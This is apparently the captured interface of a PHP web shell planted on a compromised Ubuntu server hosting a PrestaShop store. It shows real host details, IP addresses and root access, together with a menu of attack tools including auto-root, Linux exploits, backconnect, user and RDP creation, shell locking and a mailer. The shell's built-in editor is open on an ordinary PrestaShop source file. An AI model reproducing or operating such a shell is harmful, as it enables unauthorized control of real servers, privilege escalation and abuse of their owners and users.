Linux vmi284606.contaboserver.net 4.15.0-213-generic #224-Ubuntu SMP Mon Jun 19 13:30:12 UTC 2023 x86_64
Apache/2.4.57 (Ubuntu)
: 167.86.127.34 | : 216.73.217.51
Cant Read [ /etc/named.conf ]
7.2.24-0ubuntu0.18.04.17
root
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
insepet /
tienda /
src /
Core /
Addon /
Theme /
[ HOME SHELL ]
Name
Size
Permission
Action
Exception
[ DIR ]
drwxrwxrwx
Theme.php
7.47
KB
-rwxrwxrwx
ThemeCollection.php
5.8
KB
-rwxrwxrwx
ThemeExporter.php
4.67
KB
-rwxrwxrwx
ThemeManager.php
19.74
KB
-rwxrwxrwx
ThemeManagerBuilder.php
2.86
KB
-rwxrwxrwx
ThemePageLayoutsCustomizer.php
2.14
KB
-rwxrwxrwx
ThemePageLayoutsCustomizerInte...
1.28
KB
-rwxrwxrwx
ThemeProvider.php
1.86
KB
-rwxrwxrwx
ThemeProviderInterface.php
1.39
KB
-rwxrwxrwx
ThemeRepository.php
4.86
KB
-rwxrwxrwx
ThemeUploaderInterface.php
1.35
KB
-rwxrwxrwx
ThemeValidator.php
5.61
KB
-rwxrwxrwx
ThemeZipUploader.php
3.61
KB
-rwxrwxrwx
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ThemeRepository.php
<?php /** * 2007-2019 PrestaShop and Contributors * * NOTICE OF LICENSE * * This source file is subject to the Open Software License (OSL 3.0) * that is bundled with this package in the file LICENSE.txt. * It is also available through the world-wide-web at this URL: * https://opensource.org/licenses/OSL-3.0 * If you did not receive a copy of the license and are unable to * obtain it through the world-wide-web, please send an email * to license@prestashop.com so we can send you a copy immediately. * * DISCLAIMER * * Do not edit or add to this file if you wish to upgrade PrestaShop to newer * versions in the future. If you wish to customize PrestaShop for your * needs please refer to https://www.prestashop.com for more information. * * @author PrestaShop SA <contact@prestashop.com> * @copyright 2007-2019 PrestaShop SA and Contributors * @license https://opensource.org/licenses/OSL-3.0 Open Software License (OSL 3.0) * International Registered Trademark & Property of PrestaShop SA */ namespace PrestaShop\PrestaShop\Core\Addon\Theme; use PrestaShop\PrestaShop\Core\Addon\AddonListFilter; use PrestaShop\PrestaShop\Core\Addon\AddonListFilterStatus; use PrestaShop\PrestaShop\Core\Addon\AddonListFilterType; use PrestaShop\PrestaShop\Core\Addon\AddonRepositoryInterface; use PrestaShop\PrestaShop\Core\ConfigurationInterface; use PrestaShop\PrestaShop\Core\Foundation\Filesystem\FileSystem as PsFileSystem; use PrestaShopException; use Shop; use Symfony\Component\Filesystem\Filesystem; use Symfony\Component\Yaml\Parser; class ThemeRepository implements AddonRepositoryInterface { private $appConfiguration; private $filesystem; private $shop; public function __construct(ConfigurationInterface $configuration, Filesystem $filesystem, Shop $shop = null) { $this->appConfiguration = $configuration; $this->filesystem = $filesystem; $this->shop = $shop; } public function getInstanceByName($name) { $dir = $this->appConfiguration->get('_PS_ALL_THEMES_DIR_') . $name; $confDir = $this->appConfiguration->get('_PS_CONFIG_DIR_') . 'themes/' . $name; $jsonConf = $confDir . '/theme.json'; if ($this->shop) { $jsonConf = $confDir . '/shop' . $this->shop->id . '.json'; } if ($this->filesystem->exists($jsonConf)) { $data = $this->getConfigFromFile($jsonConf); } else { $data = $this->getConfigFromFile($dir . '/config/theme.yml'); // Write parsed yml data into json conf (faster parsing next time) $this->filesystem->dumpFile($jsonConf, json_encode($data), PsFileSystem::DEFAULT_MODE_FILE); } $data['directory'] = $dir; return new Theme($data); } public function getList() { if (!isset($this->themes)) { $this->themes = $this->getFilteredList(new AddonListFilter()); } return $this->themes; } /** * Gets list of themes as a collection. * * @return ThemeCollection */ public function getListAsCollection() { $list = $this->getList(); return ThemeCollection::createFrom($list); } public function getListExcluding(array $exclude) { $filter = (new AddonListFilter()) ->setExclude($exclude); return $this->getFilteredList($filter); } public function getFilteredList(AddonListFilter $filter) { $filter->setType(AddonListFilterType::THEME); if (!isset($filter->status)) { $filter->setStatus(AddonListFilterStatus::ALL); } $themes = $this->getThemesOnDisk(); if (count($filter->exclude) > 0) { foreach ($filter->exclude as $name) { unset($themes[$name]); } } return $themes; } private function getThemesOnDisk() { $suffix = 'config/theme.yml'; $themeDirectories = glob($this->appConfiguration->get('_PS_ALL_THEMES_DIR_') . '*/' . $suffix, GLOB_NOSORT); $themes = array(); foreach ($themeDirectories as $directory) { $name = basename(substr($directory, 0, -strlen($suffix))); $theme = $this->getInstanceByName($name); if (isset($theme)) { $themes[$name] = $theme; } } return $themes; } private function getConfigFromFile($file) { if (!$this->filesystem->exists($file)) { throw new PrestaShopException(sprintf( '[ThemeRepository] Theme configuration file not found for theme at `%s`.', $file )); } $content = file_get_contents($file); if (preg_match('/.\.(yml|yaml)$/', $file)) { return (new Parser())->parse($content); } elseif (preg_match('/.\.json$/', $file)) { return json_decode($content, true); } } }
Close